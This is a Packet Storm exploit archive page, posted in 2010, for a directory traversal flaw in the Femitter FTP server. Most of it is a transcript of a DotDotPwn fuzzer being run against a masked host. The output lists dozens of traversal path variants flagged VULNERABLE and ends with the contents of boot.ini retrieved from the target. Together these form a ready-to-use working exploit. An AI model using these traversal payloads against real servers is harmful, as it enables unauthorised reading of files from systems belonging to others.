what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Fermitter Server FTP Directory Traversal

Fermitter Server FTP Directory Traversal
Posted Nov 8, 2010
Authored by chr1x

Fermitter FTP Server suffers from a directory traversal vulnerability.

tags | exploit, file inclusion
SHA-256 | 970132c5b10ed122fd864cc7c3e29e404e1caf4476593f359daff81c5e0cb58e

Fermitter Server FTP Directory Traversal

Change Mirror Download
# Exploit Title: Fermitter Server FTP Directory Traversal
# Date: Nov 06, 2010
# Author: chr1x
# Software Link: http://acritum.com/software/dist/fem-dist.exe
# Description: Acritum Femitter HTTP-FTP Server is an easy-to use HTTP and FTP server application for Windows which allows you to use your own computer for sharing gigabytes of files with your friends and colleagues. No need to pay for expensive hosting! No need to spend hours to upload your files to a remote server!
# Tested on: Windows XP SP3 (Spanish Edition)


root@voltron:/dotdotpwn-v2.1# perl dotdotpwn.pl -h XXX.XXX.X.XX -m ftp -t 300 -f boot.ini -s -q -k timeout
#################################################################################
# #
# CubilFelino Chatsubo #
# Security Research Lab and [(in)Security Dark] Labs #
# chr1x.sectester.net chatsubo-labs.blogspot.com #
# #
# pr0udly present: #
# #
# ________ __ ________ __ __________ #
# \______ \ ____ _/ |_\______ \ ____ _/ |_\______ \__ _ __ ____ #
# | | \ / _ \\ __\| | \ / _ \\ __\| ___/\ \/ \/ // \ #
# | ` \( <_> )| | | ` \( <_> )| | | | \ /| | \ #
# /_______ / \____/ |__| /_______ / \____/ |__| |____| \/\_/ |___| / #
# \/ \/ \/ #
# - DotDotPwn v2.1 - #
# The Traversal Directory Fuzzer #
# http://dotdotpwn.sectester.net #
# dotdotpwn@sectester.net #
# #
# by chr1x & nitr0us #
#################################################################################


[========== TARGET INFORMATION ==========]
[+] Hostname: XXX.XXX.X.XX
[+] Protocol: ftp
[+] Port: 21
[+] Service detected:
220 Femitter FTP Server ready.

[=========== TRAVERSAL ENGINE ===========]
[+] Creating Traversal patterns (mix of dots and slashes)
[+] Permuting 6 times the traversal patterns (-d switch)
[+] Creating the Special Traversal patterns
[+] Translating (back)slashes in the filenames
[+] Appending 'boot.ini' to the Traversal Strings
[+] Including Special sufixes
[+] Traversal Engine DONE ! - Total traversal tests created: 1164

[=========== TESTING RESULTS ============]
[+] Ready to launch 3.33 traversals per second
[+] Press any key to start the testing (You can stop it pressing Ctrl + C)

[+] Username: anonymous
[+] Password: dot@dot.pwn
[+] Connecting to the FTP server at 'XXX.XXX.X.XX' on port 21
[+] FTP Server's Current Path: /C:/Archivos de programa/Femitter/Shared
[+] Local Path to download files: /dotdotpwn-v2.1/retrieved_files
[+] Press any key to continue

[+] Testing ...
.
[*] GET ../../../boot.ini <- VULNERABLE!

[*] GET ../../../../boot.ini <- VULNERABLE!

[*] GET ../../../../../boot.ini <- VULNERABLE!

[*] GET ../../../../../../boot.ini <- VULNERABLE!

[*] GET ..\..\..\boot.ini <- VULNERABLE!

[*] GET ..\..\..\..\boot.ini <- VULNERABLE!

[*] GET ..\..\..\..\..\boot.ini <- VULNERABLE!

[*] GET ..\..\..\..\..\..\boot.ini <- VULNERABLE!
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
[*] GET ..//..//..//boot.ini <- VULNERABLE!

[*] GET ..//..//..//..//boot.ini <- VULNERABLE!

[*] GET ..//..//..//..//..//boot.ini <- VULNERABLE!

[*] GET ..//..//..//..//..//..//boot.ini <- VULNERABLE!

[*] GET ..///..///..///boot.ini <- VULNERABLE!

[*] GET ..///..///..///..///boot.ini <- VULNERABLE!

[*] GET ..///..///..///..///..///boot.ini <- VULNERABLE!

[*] GET ..///..///..///..///..///..///boot.ini <- VULNERABLE!

[*] GET ..\\..\\..\\boot.ini <- VULNERABLE!

[*] GET ..\\..\\..\\..\\boot.ini <- VULNERABLE!

[*] GET ..\\..\\..\\..\\..\\boot.ini <- VULNERABLE!

[*] GET ..\\..\\..\\..\\..\\..\\boot.ini <- VULNERABLE!

[*] GET ..\\\..\\\..\\\boot.ini <- VULNERABLE!

[*] GET ..\\\..\\\..\\\..\\\boot.ini <- VULNERABLE!

[*] GET ..\\\..\\\..\\\..\\\..\\\boot.ini <- VULNERABLE!

[*] GET ..\\\..\\\..\\\..\\\..\\\..\\\boot.ini <- VULNERABLE!
.
[*] GET ../\../\../\boot.ini <- VULNERABLE!

[*] GET ../\../\../\../\boot.ini <- VULNERABLE!

[*] GET ../\../\../\../\../\boot.ini <- VULNERABLE!

[*] GET ../\../\../\../\../\../\boot.ini <- VULNERABLE!

[*] GET ..\/..\/..\/boot.ini <- VULNERABLE!

[*] GET ..\/..\/..\/..\/boot.ini <- VULNERABLE!

[*] GET ..\/..\/..\/..\/..\/boot.ini <- VULNERABLE!

[*] GET ..\/..\/..\/..\/..\/..\/boot.ini <- VULNERABLE!

[*] GET ../\/../\/../\/boot.ini <- VULNERABLE!

[*] GET ../\/../\/../\/../\/boot.ini <- VULNERABLE!

[*] GET ../\/../\/../\/../\/../\/boot.ini <- VULNERABLE!

[*] GET ../\/../\/../\/../\/../\/../\/boot.ini <- VULNERABLE!

[*] GET ..\/\..\/\..\/\boot.ini <- VULNERABLE!

[*] GET ..\/\..\/\..\/\..\/\boot.ini <- VULNERABLE!

[*] GET ..\/\..\/\..\/\..\/\..\/\boot.ini <- VULNERABLE!

[*] GET ..\/\..\/\..\/\..\/\..\/\..\/\boot.ini <- VULNERABLE!

[*] GET \../\../\../boot.ini <- VULNERABLE!

[*] GET \../\../\../\../boot.ini <- VULNERABLE!

[*] GET \../\../\../\../\../boot.ini <- VULNERABLE!

[*] GET \../\../\../\../\../\../boot.ini <- VULNERABLE!
.
[*] GET /..\/..\/..\boot.ini <- VULNERABLE!

[*] GET /..\/..\/..\/..\boot.ini <- VULNERABLE!

[*] GET /..\/..\/..\/..\/..\boot.ini <- VULNERABLE!

[*] GET /..\/..\/..\/..\/..\/..\boot.ini <- VULNERABLE!
.
[*] GET ./.././.././../boot.ini <- VULNERABLE!

[*] GET ./.././.././.././../boot.ini <- VULNERABLE!

[*] GET ./.././.././.././.././../boot.ini <- VULNERABLE!

[*] GET ./.././.././.././.././.././../boot.ini <- VULNERABLE!

[*] GET .\..\.\..\.\..\boot.ini <- VULNERABLE!

[*] GET .\..\.\..\.\..\.\..\boot.ini <- VULNERABLE!

[*] GET .\..\.\..\.\..\.\..\.\..\boot.ini <- VULNERABLE!

[*] GET .\..\.\..\.\..\.\..\.\..\.\..\boot.ini <- VULNERABLE!

[*] GET .//..//.//..//.//..//boot.ini <- VULNERABLE!

[*] GET .//..//.//..//.//..//.//..//boot.ini <- VULNERABLE!

[*] GET .//..//.//..//.//..//.//..//.//..//boot.ini <- VULNERABLE!

[*] GET .//..//.//..//.//..//.//..//.//..//.//..//boot.ini <- VULNERABLE!
.
[*] GET .\\..\\.\\..\\.\\..\\boot.ini <- VULNERABLE!

[*] GET .\\..\\.\\..\\.\\..\\.\\..\\boot.ini <- VULNERABLE!

[*] GET .\\..\\.\\..\\.\\..\\.\\..\\.\\..\\boot.ini <- VULNERABLE!

[*] GET .\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\boot.ini <- VULNERABLE!
. . . . . . . . . .
[+] Fuzz testing finished after 6.13 minutes (368 seconds)
[+] Total Traversals found: 64
root@voltron:/dotdotpwn-v2.1# cat ./retrieved_files/boot.ini
[boot loader]
timeout=30
default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS
[operating systems]
multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Professional" /noexecute=optin /fastdetect
root@voltron:/dotdotpwn-v2.1#

Login or Register to add favorites

File Archive:

July 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    27 Files
  • 2
    Jul 2nd
    10 Files
  • 3
    Jul 3rd
    35 Files
  • 4
    Jul 4th
    27 Files
  • 5
    Jul 5th
    18 Files
  • 6
    Jul 6th
    0 Files
  • 7
    Jul 7th
    0 Files
  • 8
    Jul 8th
    28 Files
  • 9
    Jul 9th
    44 Files
  • 10
    Jul 10th
    24 Files
  • 11
    Jul 11th
    25 Files
  • 12
    Jul 12th
    11 Files
  • 13
    Jul 13th
    0 Files
  • 14
    Jul 14th
    0 Files
  • 15
    Jul 15th
    28 Files
  • 16
    Jul 16th
    6 Files
  • 17
    Jul 17th
    0 Files
  • 18
    Jul 18th
    0 Files
  • 19
    Jul 19th
    0 Files
  • 20
    Jul 20th
    0 Files
  • 21
    Jul 21st
    0 Files
  • 22
    Jul 22nd
    0 Files
  • 23
    Jul 23rd
    0 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close